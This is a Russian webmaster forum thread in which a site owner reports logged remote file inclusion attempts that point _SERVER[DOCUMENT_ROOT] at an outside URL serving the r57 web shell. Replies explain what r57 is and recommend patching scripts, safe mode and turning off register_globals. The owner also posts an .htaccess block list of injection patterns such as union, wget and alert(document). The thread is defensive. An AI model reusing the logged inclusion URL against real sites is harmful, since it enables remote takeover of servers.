- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Часто вижу в логах вот такую ссылку http://мойсайт.ru/index.php?_SERVER[DOCUMENT_ROOT]=http://jeannedawsonart.com/images/r57?????
С помощью файла r57.php заливают мне в корень сайта всякий хлам.
Что не правильно настроено в защите моего сервера и как исправить уязвимость?
Модераторы, удалите ссылку, там троян!
Я ссылку поставил не активной специально, чтобы народ туда не ходил не обдумав.
Я описал серьезность файла r57.php.
Зачем удалять?
Нужен совет специалиста, а не крики ламера.
kosenka, во-первых, ссылок нет. Во-вторых, человек как раз и спрашивает, как бы сделать, чтобы ему ничего не заливали.
Федорыч, исправляй дырки в скриптах.
Федорыч, исправляй дырки в скриптах.
Такой же сайт стоит на мастерхосте. Там этот r57.php не работает. Значит проблема на моем сервере, а не в дырах в скриптах.
обновить скрипт до последней версии, если это уже последняя версия - связаться с автором скрипта и сообщить о том что он небезопасный
если r57 не будет работать - будут использовать другой скрипт, но в принципе немного улучшает ситуацию включение режима safe_mod в php
Дыру нашел, действительно это был скрипт сайта.
Буду исправлять.
r57 это веб-шелл, через который можно получить доступ к серверу через браузер, если на сервере safe mode on, то команды через шелл выполнятся не будут. А уж как шелл попал на сервер - надо смотреть каждый конкретный случай. Если через фтп, то и safe mode не поможет.
Посмотрите заодно не понаставили ли вам ифреймов в страницы.
Прописал в файл .htaccess
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR]
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)union(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)UNION(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)SERVER(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)DOCUMENT_ROOT(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)SERVER[DOCUMENT_ROOT](.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)http(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)ftp(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)alert\(document(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)SQL_INJECTION(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)wget\%20
RewriteRule ^.*$ http://127.0.0.1/ [R,L]
Помогло.
Нашел на форуме http://www.netcat.ru/support/ncforum/?Subdiv_ID=1&Topic_ID=813&Page_NUM=1
Прописал в файл .htaccess
Туда достаточно прописать "php_flag register_globals Off"
Или в php.ini "register_globals = Off"